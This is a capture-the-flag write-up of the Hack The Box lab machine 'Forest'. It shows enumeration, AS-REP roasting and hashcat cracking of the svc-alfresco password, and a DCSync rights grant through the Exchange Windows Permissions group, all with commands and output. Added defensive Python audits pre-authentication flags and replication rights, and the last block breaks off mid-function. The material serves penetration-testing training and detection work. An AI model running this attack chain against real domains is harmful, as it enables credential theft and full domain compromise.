Introduction
This is my writeup of Forest on Hack The Box (https://www.hackthebox.eu/).
I tried to do as much as possible from a Windows environment, but there were some parts that seemed doable only from Linux (Kali). If any of those parts can also be done on Windows, I would appreciate hearing about it.
The OS each step was run on (Kali or Win) is noted in each heading.
Procedure
- Target server: 10.10.10.161
(Kali) Port scan
I used nmap.
Findings:
- FQDN: FOREST.htb.local
- An AD environment exists
- Domain name: htb.local (HTB)
- The target server is a domain controller (DC)
- Main open ports: see below
$ nmap 10.10.10.161 -A -v -Pn -n
(snip)
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-08 13:40:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
(snip)
Host script results:
|_clock-skew: mean: 2h28m45s, deviation: 4h02m30s, median: 8m45s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2020-03-08T06:43:11-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-08 09:43:12
|_ start_date: 2020-03-08 09:25:00
(snip)
(Kali) User enumeration
I used enum4linux.
Findings (only the parts that looked relevant are excerpted):
- The following users exist (main ones)

| User ID | Group membership |
|---|---|
| Administrator | Domain Admins, Group Policy Creator Owners, Domain Users, Schema Admins, Enterprise Admins |
| krbtgt | Domain Users |
| sebastien | Domain Users |
| lucinda | Domain Users |
| svc-alfresco | Domain Users, Service Accounts |
| andy | Domain Users |
| mark | Domain Users |
| santi | Domain Users |
$ enum4linux 10.10.10.161
(snip)
==========================
| Target Information |
==========================
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
(snip)
===========================================
| Getting domain SID for 10.10.10.161 |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
(snip)
=============================
| Users on 10.10.10.161 |
=============================
(snip)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
(snip)
==============================
| Groups on 10.10.10.161 |
==============================
[+] Getting builtin groups:
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]
group:[Server Operators] rid:[0x225]
(snip)
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
(snip)
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
(snip)
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Exchange Windows Permissions' (RID: 1121) has member: HTB\Exchange Trusted Subsystem
Group 'Domain Users' (RID: 513) has member: HTB\Administrator
Group 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
Group 'Domain Users' (RID: 513) has member: HTB\krbtgt
(snip)
Group 'Domain Users' (RID: 513) has member: HTB\sebastien
Group 'Domain Users' (RID: 513) has member: HTB\lucinda
Group 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group 'Domain Users' (RID: 513) has member: HTB\andy
Group 'Domain Users' (RID: 513) has member: HTB\mark
Group 'Domain Users' (RID: 513) has member: HTB\santi
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Schema Admins' (RID: 518) has member: HTB\Administrator
Group 'Domain Admins' (RID: 512) has member: HTB\Administrator
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Domain Computers' (RID: 515) has member: HTB\EXCH01$
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Group Policy Creator Owners' (RID: 520) has member: HTB\Administrator
Group '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: HTB\EXCH01$
Group 'Domain Guests' (RID: 514) has member: HTB\Guest
Group 'Managed Availability Servers' (RID: 1120) has member: HTB\EXCH01$
Group 'Managed Availability Servers' (RID: 1120) has member: HTB\Exchange Servers
Group 'Organization Management' (RID: 1104) has member: Could not connect to server 10.10.10.161
Group 'Organization Management' (RID: 1104) has member: Connection failed: NT_STATUS_IO_TIMEOUT
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
Group 'Exchange Servers' (RID: 1118) has member: HTB\EXCH01$
Group 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
(snip)
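The membership table above was assembled by hand from the enum4linux output. As an added example (not part of the original writeup), the following Python parses the three line shapes that matter (`user:[...] rid:[...]`, `group:[...] rid:[...]`, and `Group '...' (RID: n) has member: DOMAIN\name`), skips the RPC error text that enum4linux prints in place of members when a lookup times out, separates built-in principals (RID below 1000) from ones created after domain setup, and resolves nested membership. Nesting is the point a defender cares about: the output shows `Service Accounts` inside `Privileged IT Accounts`, so svc-alfresco's effective membership is wider than the direct membership the table lists. The sample text is a constructed excerpt of the output shown above.

```python
import re
from collections import defaultdict

# Constructed excerpt of the enum4linux output above (assumption: the real run
# has many more lines of these same three shapes, plus unrelated banner text).
ENUM4LINUX_OUTPUT = """\
user:[Administrator] rid:[0x1f4]
user:[krbtgt] rid:[0x1f6]
user:[sebastien] rid:[0x479]
user:[svc-alfresco] rid:[0x47b]
group:[Domain Admins] rid:[0x200]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\\Service Accounts
Group 'Domain Users' (RID: 513) has member: HTB\\Administrator
Group 'Domain Users' (RID: 513) has member: HTB\\sebastien
Group 'Domain Users' (RID: 513) has member: HTB\\svc-alfresco
Group 'Service Accounts' (RID: 1148) has member: HTB\\svc-alfresco
Group 'Domain Admins' (RID: 512) has member: HTB\\Administrator
Group 'Organization Management' (RID: 1104) has member: Could not connect to server 10.10.10.161
Group 'Organization Management' (RID: 1104) has member: Connection failed: NT_STATUS_IO_TIMEOUT
"""

USER_RE = re.compile(r"^user:\[(?P<name>[^\]]+)\] rid:\[(?P<rid>0x[0-9a-fA-F]+)\]$")
GROUP_RE = re.compile(r"^group:\[(?P<name>[^\]]+)\] rid:\[(?P<rid>0x[0-9a-fA-F]+)\]$")
MEMBER_RE = re.compile(r"^Group '(?P<group>[^']+)' \(RID: (?P<rid>\d+)\) has member: (?P<member>.*)$")

WELL_KNOWN_RID_LIMIT = 1000  # RIDs below 1000 are reserved for built-in principals


def parse_enum4linux(text):
    """Return (users, groups, members): name -> RID maps and group -> set of direct members."""
    users, groups, members = {}, {}, defaultdict(set)
    for raw in text.splitlines():
        line = raw.strip()
        if m := USER_RE.match(line):
            users[m["name"]] = int(m["rid"], 16)
        elif m := GROUP_RE.match(line):
            groups[m["name"]] = int(m["rid"], 16)
        elif m := MEMBER_RE.match(line):
            groups.setdefault(m["group"], int(m["rid"]))
            _domain, sep, name = m["member"].partition("\\")
            # Membership lines carry "DOMAIN\name"; without a backslash the text is an
            # RPC error message (as with 'Organization Management' above), not a member.
            if sep:
                members[m["group"]].add(name)
    return users, groups, members


def effective_groups(principal, members):
    """Resolve nested membership: every group the principal is in directly or transitively."""
    result = set()
    stack = [g for g, ms in members.items() if principal in ms]
    while stack:
        group = stack.pop()
        if group in result:
            continue
        result.add(group)
        stack.extend(parent for parent, ms in members.items() if group in ms)
    return result


def custom_principals(users, groups):
    """Users and groups created after domain setup (RID >= 1000): the ones to review first."""
    return sorted([n for n, r in users.items() if r >= WELL_KNOWN_RID_LIMIT]
                  + [n for n, r in groups.items() if r >= WELL_KNOWN_RID_LIMIT])


if __name__ == "__main__":
    users, groups, members = parse_enum4linux(ENUM4LINUX_OUTPUT)
    print("custom principals:", custom_principals(users, groups))
    for user in users:
        print(f"{user:15} -> {sorted(effective_groups(user, members))}")
```

Run against the full output, `effective_groups` for each user is the membership audit the flattened `Group ... has member` lines do not give directly, and `custom_principals` narrows the review to what the domain's operators actually created.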
(Kali) Kerberos investigation
Using the list of users obtained above and a known password list, I attempted authentication with kerbrute.py. I used 500-worst-passwords.txt as the password list.
Right after the run started, it turned out that the svc-alfresco user does not require pre-authentication (NOT PREAUTH).
Since trying authentication against every user was expected to take a long time, I decided to attempt AS-REP Roast (reference [1]) against the svc-alfresco user instead.
$ cat ./users.txt
Administrator
krbtgt
sebastien
lucinda
svc-alfresco
andy
mark
santi
$ python3 kerbrute.py -users ./users.txt -passwords ./500-worst-passwords.txt -domain htb.local -dc-ip 10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Blocked/Disabled user => krbtgt
[*] Valid user => sebastien
[*] Valid user => lucinda
[*] Valid user => svc-alfresco [NOT PREAUTH]
[*] Valid user => andy
[*] Valid user => mark
[*] Valid user => santi
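The `[NOT PREAUTH]` flag above corresponds to the `DONT_REQ_PREAUTH` bit (0x400000) in the account's `userAccountControl` attribute. As an added example (not part of the original writeup), the following Python decodes that bitmask the way a defender would when auditing accounts before someone else finds them, and reports the two conditions that decide how bad a finding is: whether the account is disabled (kerbrute's "Blocked/Disabled user" case, which yields no AS-REP) and whether the account advertises AES keys, because with no AES bits the KDC encrypts the AS-REP with the RC4 key derived from the NT hash, which is the etype 23 hash cracked in the next section. The `LDAP_PREAUTH_FILTER` string is the equivalent directory query. All account records are constructed; only the 0x200 value for Administrator comes from this page (the `00000200 ( NORMAL_ACCOUNT )` line in the DCSync output further down).

```python
# userAccountControl bits (from Microsoft's userAccountControl documentation; only the
# ones relevant to this audit are listed).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# msDS-SupportedEncryptionTypes bits: AES128 (0x08) | AES256 (0x10) is the hardened state.
ETYPE_AES = 0x08 | 0x10

# The same check as an LDAP filter (1.2.840.113556.1.4.803 is the bitwise-AND matching
# rule; 4194304 == 0x400000 == DONT_REQ_PREAUTH).
LDAP_PREAUTH_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    "(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
)

# Constructed sample records. Administrator's 0x200 matches the value shown later on this
# page; the other three are made up to exercise each branch of the audit.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200},
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 0x400200},       # NOT PREAUTH, no AES advertised
    {"sAMAccountName": "svc-aes", "userAccountControl": 0x400200,
     "msDS-SupportedEncryptionTypes": ETYPE_AES},                             # NOT PREAUTH but AES-only
    {"sAMAccountName": "old-svc", "userAccountControl": 0x400200 | ACCOUNTDISABLE},  # NOT PREAUTH but disabled
]


def decode_uac(value):
    """Names of the flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def audit_preauth(accounts):
    """Accounts the KDC will hand an AS-REP to without pre-authentication (AS-REP roastable)."""
    findings = []
    for acct in accounts:
        uac = acct["userAccountControl"]
        if not uac & DONT_REQ_PREAUTH:
            continue
        etypes = acct.get("msDS-SupportedEncryptionTypes", 0)
        findings.append({
            "sAMAccountName": acct["sAMAccountName"],
            "flags": decode_uac(uac),
            # A disabled account gets KDC_ERR_CLIENT_REVOKED instead of an AS-REP (compare
            # the "Blocked/Disabled user => krbtgt" line above), so it is not roastable
            # until it is re-enabled.
            "disabled": bool(uac & ACCOUNTDISABLE),
            # With no AES bits (attribute unset, or RC4 only) the AS-REP enc-part is keyed
            # with RC4-HMAC from the NT hash: one MD4 per guess, the etype 23 case that
            # hashcat mode 18200 handles at millions of guesses per second below. AES
            # AS-REPs are still roastable, but each guess costs 4096 PBKDF2 iterations.
            "rc4_fallback": not (etypes & ETYPE_AES),
        })
    return findings


if __name__ == "__main__":
    for finding in audit_preauth(SAMPLE_ACCOUNTS):
        print(finding)
```

The remediation this points at is the same in every case: clear `DONT_REQ_PREAUTH` unless a specific client genuinely cannot pre-authenticate, and where it must stay, give the account a long random password and AES-only encryption types.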
(Kali, Win) AS-REP Roast
I used GetNPUsers.py to obtain the AS-REP hash of the HTB\svc-alfresco user.
$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py htb.local/svc-alfresco -no-pass -dc-ip 10.10.10.161
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:bf1e1fb69134c44ef3668f6c4f18cac3$ff2b5ee128d9560d8a2b068f5ce6ca0e678b9442294769587e45d97ae08548a0837ccf47699a0ed350f1d6630b0e5a2d2f32b26b028a0497e2b40f2d35cf31eeaf864dd7952dce3ebf90dfba11a60ef9158a0be084c2d237f29b96b08ec5e9f52f9770fe2b97f4f08f4a5910e1f70c59b90b2a31c5139e2d9564e9a73c662b6308896e58d0197b7f43dded415339bfd79be705fbda07e550630f80f7a600fb289dd781869d8d2b0facf8ef6a068f80c91d42692397a6ca069eae559ff110de531a90124734db709b290ffb50c612909e9a760b2cb3fe83219a66e453e3261a72c615337405da
I used hashcat to crack the AS-REP hash obtained above. For the wordlist I used rockyou.txt, which ships with Kali.
The result showed that the password of the HTB\svc-alfresco user is s3rvice.
From here on, I use the credentials obtained here (ID: HTB\svc-alfresco, pass: s3rvice).
> .\hashcat64.exe -m 18200 -a 0 -O .\hash_alfresco.txt .\rockyou.txt
(snip)
$krb5asrep$23$svc-alfresco@HTB.LOCAL:bf1e1fb69134c44ef3668f6c4f18cac3$ff2b5ee128d9560d8a2b068f5ce6ca0e678b9442294769587e45d97ae08548a0837ccf47699a0ed350f1d6630b0e5a2d2f32b26b028a0497e2b40f2d35cf31eeaf864dd7952dce3ebf90dfba11a60ef9158a0be084c2d237f29b96b08ec5e9f52f9770fe2b97f4f08f4a5910e1f70c59b90b2a31c5139e2d9564e9a73c662b6308896e58d0197b7f43dded415339bfd79be705fbda07e550630f80f7a600fb289dd781869d8d2b0facf8ef6a068f80c91d42692397a6ca069eae559ff110de531a90124734db709b290ffb50c612909e9a760b2cb3fe83219a66e453e3261a72c615337405da:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:bf1e1fb69134c4...7405da
Time.Started.....: Mon Mar 09 11:52:46 2020 (1 sec)
Time.Estimated...: Mon Mar 09 11:52:47 2020 (0 secs)
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 10231.9 kH/s (6.85ms) @ Accel:512 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4916264/14344384 (34.27%)
Rejected.........: 1064/4916264 (0.02%)
Restore.Point....: 3933082/14344384 (27.42%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: se7ven1985 -> omarcito23
Hardware.Mon.#1..: Temp: 48c Util: 13% Core: 960MHz Mem:6801MHz Bus:16
(Win) Investigating privileged users
I enumerated the users holding elevated privileges (AdminCount = 1) in the htb.local domain.
The result showed that the HTB\svc-alfresco user obtained above is a privileged user.
ADModule is used here.
> runas /netonly /user:HTB\svc-alfresco powershell.exe
HTB\svc-alfresco のパスワードを入力してください:
powershell.exe をユーザー "HTB\svc-alfresco" として開始しています...
> Import-Module .\ADModule-master\Microsoft.ActiveDirectory.Management.dll
> Import-Module .\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
> Get-ADObject -Filter {AdminCount -eq 1} -Server forest.htb.local
DistinguishedName Name ObjectClass ObjectGUID
----------------- ---- ----------- ----------
CN=Read-only Domain Controllers,CN=Users,DC=htb,DC=local Read-only Domain Controllers group b33b7263-e2e2-4014-a7fc-fdd641d27919
CN=Administrator,CN=Users,DC=htb,DC=local Administrator user a8133c53-217c-40e2-81cb-887e0f61bdb0
CN=krbtgt,CN=Users,DC=htb,DC=local krbtgt user 4e6893d1-0f65-446c-aa8c-315b78ccf9bc
CN=Domain Controllers,CN=Users,DC=htb,DC=local Domain Controllers group f0057b04-7993-49ba-af49-93006469db51
CN=Schema Admins,CN=Users,DC=htb,DC=local Schema Admins group 5ac47aae-ea30-4392-91ed-ca3f6fa4a3c0
CN=Enterprise Admins,CN=Users,DC=htb,DC=local Enterprise Admins group 1d4f5503-50ac-44fc-8d9f-fd7cede17a33
CN=Domain Admins,CN=Users,DC=htb,DC=local Domain Admins group 7276b065-f6d1-4c04-b091-25ffa1cf9abf
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local svc-alfresco user 58a51302-4c7c-4686-9502-d3ada3afaef1
CN=Service Accounts,OU=Security Groups,DC=htb,DC=local Service Accounts group 8b287cd5-8692-484c-bbe7-03ab3764d060
CN=Privileged IT Accounts,OU=Security Groups,DC=htb,DC=local Privileged IT Accounts group be8fee5e-79fa-4b5b-aea5-79222caf26b9
CN=Account Operators,CN=Builtin,DC=htb,DC=local Account Operators group a7a4d8b8-3ba8-40f8-9dfd-879bfd6a4964
CN=Administrators,CN=Builtin,DC=htb,DC=local Administrators group 40b6508d-2756-4d63-a2fd-05336a6f335d
CN=Print Operators,CN=Builtin,DC=htb,DC=local Print Operators group 21429604-27ba-44a8-9676-6e4f0338ecc8
CN=Backup Operators,CN=Builtin,DC=htb,DC=local Backup Operators group 394bc784-6a8b-4406-9a69-5593f3c93bd8
CN=Replicator,CN=Builtin,DC=htb,DC=local Replicator group 081a0378-3e5a-4270-9eec-538ff44eb891
CN=Server Operators,CN=Builtin,DC=htb,DC=local Server Operators group 825c599e-0c08-4909-9421-9de73ded4fdb
(Win) Investigating whether privilege escalation is possible
From the enum4linux results, we already know that the htb.local domain has an Exchange Windows Permissions group.
Just to be sure, I check this with the Get-ADGroup cmdlet from ADModule.
> Get-ADGroup -Server forest.htb.local -Filter * | select name
name
----
Administrators
Users
Guests
(snip)
Exchange Windows Permissions
(snip)
It is known that adding Ds-Replication-Get-Changes and Ds-Replication-Get-Changes-All as Extended Rights through the Exchange Windows Permissions group makes it possible to run DCSync (reference [2]).
So I try to run DCSync with the following steps:
- Add a new user (HTB\hoge)
- Add the HTB\hoge user to the Exchange Windows Permissions group
- Add Ds-Replication-Get-Changes and Ds-Replication-Get-Changes-All as Extended Rights for the HTB\hoge user
- Run DCSync with the HTB\hoge user's privileges
(Win) Adding the user, group membership and rights
Add a new user with the HTB\svc-alfresco user's privileges.
> Import-Module .\ADModule-master\Microsoft.ActiveDirectory.Management.dll
> Import-Module .\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
> $pwd=ConvertTo-SecureString "hogehoge" -AsPlainText -Force
> New-ADUser hoge -Server forest.htb.local -AccountPassword $pwd -Enabled $true
Add the HTB\hoge user to the Exchange Windows Permissions group.
> Add-ADGroupMember -Server forest.htb.local -Identity 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=htb,DC=local' hoge
Set the HTB\hoge user as privileged (AdminCount = 1).
> Set-ADUser -Identity hoge -Replace @{adminCount=1} -Server forest.htb.local
Using PowerView_dev.ps1, add Ds-Replication-Get-Changes and Ds-Replication-Get-Changes-All as Extended Rights for the HTB\hoge user.
From here on, the HTB\hoge user is used.
> runas /netonly /user:HTB\hoge powershell.exe
HTB\hoge のパスワードを入力してください:
powershell.exe をユーザー "HTB\hoge" として開始しています...
> . .\PowerView_dev.ps1
> Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -Rights DCSync -TargetDomain htb.local -PrincipalDomain htb.local -PrincipalIdentity hoge -DomainController forest.htb.local -Verbose
詳細: [Get-DomainSearcher] search base: LDAP://forest.htb.local/DC=htb,DC=local
詳細: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=hoge)(name=hoge)(displayname=hoge))))
詳細: [Get-DomainSearcher] search base: LDAP://forest.htb.local/DC=htb,DC=local
詳細: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=DC=htb,DC=local)))
詳細: [Add-DomainObjectAcl] Granting principal CN=hoge,CN=Users,DC=htb,DC=local 'DCSync' on DC=htb,DC=local
詳細: [Add-DomainObjectAcl] Granting principal CN=hoge,CN=Users,DC=htb,DC=local rights GUID
'1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' on DC=htb,DC=local
詳細: [Add-DomainObjectAcl] Granting principal CN=hoge,CN=Users,DC=htb,DC=local rights GUID
'1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' on DC=htb,DC=local
詳細: [Add-DomainObjectAcl] Granting principal CN=hoge,CN=Users,DC=htb,DC=local rights GUID
'89e95b76-444d-4c62-991a-0facbeda640c' on DC=htb,DC=local
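The three GUIDs in the PowerView output above are the control access rights that make DCSync possible: `1131f6aa-...` is DS-Replication-Get-Changes, `1131f6ad-...` is DS-Replication-Get-Changes-All (the one that returns secrets), and `89e95b76-...` is DS-Replication-Get-Changes-In-Filtered-Set. As an added example from the defender's side (not part of the original writeup), the following Python shows the two checks that catch this step and the next one: an audit of the domain root's ACL for replication rights held by anything other than the domain controllers themselves, and a rule over Security event 4662 records that fires when a non-machine account exercises those rights. The ACE and event records are constructed in the shape of `(Get-Acl "AD:\DC=htb,DC=local").Access` entries and of 4662 `Properties` fields; `DEFAULT_HOLDERS` is an assumption to be tuned per forest.

```python
import re

# Control-access-right GUIDs, taken from the Add-DomainObjectAcl output above, mapped to
# the rights they identify.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12}")

# Principals that hold replication rights on a domain root by default (lower-cased for
# comparison). Assumption: tune this per forest, e.g. add an Azure AD Connect account.
DEFAULT_HOLDERS = frozenset({
    "domain controllers", "enterprise domain controllers",
    "read-only domain controllers", "enterprise read-only domain controllers",
    "administrators", "system",
})


def _ace(identity, guid, rights="ExtendedRight", kind="Allow"):
    return {"IdentityReference": identity, "ObjectType": guid,
            "ActiveDirectoryRights": rights, "AccessControlType": kind}


# Constructed ACEs in the shape of (Get-Acl "AD:\DC=htb,DC=local").Access entries. The
# three HTB\hoge entries mirror exactly what the PowerView output above says was granted.
SAMPLE_ACES = [
    _ace("HTB\\Domain Controllers", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
    _ace("HTB\\Domain Controllers", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
    _ace("NT AUTHORITY\\ENTERPRISE DOMAIN CONTROLLERS", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
    _ace("HTB\\hoge", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
    _ace("HTB\\hoge", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
    _ace("HTB\\hoge", "89e95b76-444d-4c62-991a-0facbeda640c"),
    _ace("HTB\\hoge", "00000000-0000-0000-0000-000000000000", rights="ReadProperty"),  # unrelated
]

# Constructed records in the shape of Security event 4662 ("An operation was performed on
# an object"). Properties lists the access type (%%7688 = Control Access) followed by the
# GUIDs of the rights exercised; 19195a5b-... is the domainDNS class of the target object,
# bf967aba-... is the user class.
_REPL_PROPS = ("%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
               "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
               "\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}")
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "HTB", "SubjectUserName": "FOREST$", "Properties": _REPL_PROPS},
    {"EventID": 4662, "SubjectDomainName": "HTB", "SubjectUserName": "hoge", "Properties": _REPL_PROPS},
    {"EventID": 4662, "SubjectDomainName": "HTB", "SubjectUserName": "hoge",
     "Properties": "%%7688\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},      # a user object, not replication
    {"EventID": 4624, "SubjectDomainName": "HTB", "SubjectUserName": "hoge", "Properties": ""},
]


def audit_domain_acl(aces, expected_holders=DEFAULT_HOLDERS):
    """Allow ACEs on the domain root granting a replication right to an unexpected principal."""
    findings = []
    for ace in aces:
        if ace.get("AccessControlType", "Allow") != "Allow":
            continue
        right = REPLICATION_RIGHTS.get(ace["ObjectType"].lower())
        if right is None:
            continue
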